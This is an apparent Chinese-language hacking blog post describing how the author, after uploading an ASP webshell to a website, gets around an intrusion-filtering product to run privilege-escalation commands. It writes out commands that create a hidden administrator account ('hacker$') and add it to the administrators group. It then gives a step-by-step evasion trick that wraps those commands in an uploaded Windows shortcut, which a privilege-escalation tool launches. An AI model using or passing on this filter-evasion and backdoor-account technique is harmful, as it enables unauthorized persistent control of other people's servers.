第一篇：突破變態(tài)限制一流信息攔截系統(tǒng)執(zhí)行CMD

突破變態(tài)限制一流信息攔截系統(tǒng)執(zhí)行CMD

有突破一流信息攔截系統(tǒng)的網(wǎng)站，上傳個(gè)馬就不容易，好容易上傳了，還不能執(zhí)行命令，郁悶了..執(zhí)行命令提權(quán)的時(shí)候因?yàn)槊罾镉?net user 被攔截，我KAO，換個(gè)思路。

運(yùn)行批命令和直接執(zhí)行命令效果是一樣的，它既然不讓執(zhí)行net命令，我運(yùn)行批命令還不行嗎？

立刻動(dòng)手，在asp馬里點(diǎn)[新建文件] 把名字改稱hacker.bat 在內(nèi)容里寫上： net usernet user hacker$ /del

net usernet user hacker$ hacker /add

net localgroup administrators hacker$ /add

OK。保存！

暈！不成功！直接被攔....郁悶了一會(huì)，又想個(gè)辦法：在本地弄個(gè)批命令，然后上傳，這攔截系統(tǒng)總不會(huì)對(duì)文件攔截吧？

OK。上傳！

暈！又被攔！...難道這家伙真到看文件內(nèi)容？

那它是怎么看的？

給服務(wù)器按個(gè)OD之類的？

不大現(xiàn)實(shí)...真正的EXE 程序想執(zhí)行命令必然不會(huì)把命令原樣保持在程序里的，自己寫個(gè)程序試試？

暈！沒工具...又沒經(jīng)驗(yàn)...算了

回家看電子書...1998-2002的綠盟的文章，好多..看到個(gè)2000系統(tǒng)輸入法漏洞入侵的文章，在文章結(jié)尾作者提出了幾個(gè)問題，后來有高手做了答。

看到這幾個(gè)問題的答案，偶突然有了突破一流信息攔截系統(tǒng)執(zhí)行命令的方法...1、準(zhǔn)備提權(quán)命令：cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add2、新建快捷方式，在地址欄寫入提權(quán)命令

3、上傳這個(gè)快捷方式

4、在提權(quán)工具幫助下運(yùn)行這個(gè)快捷方式.....5、管理員添加成功....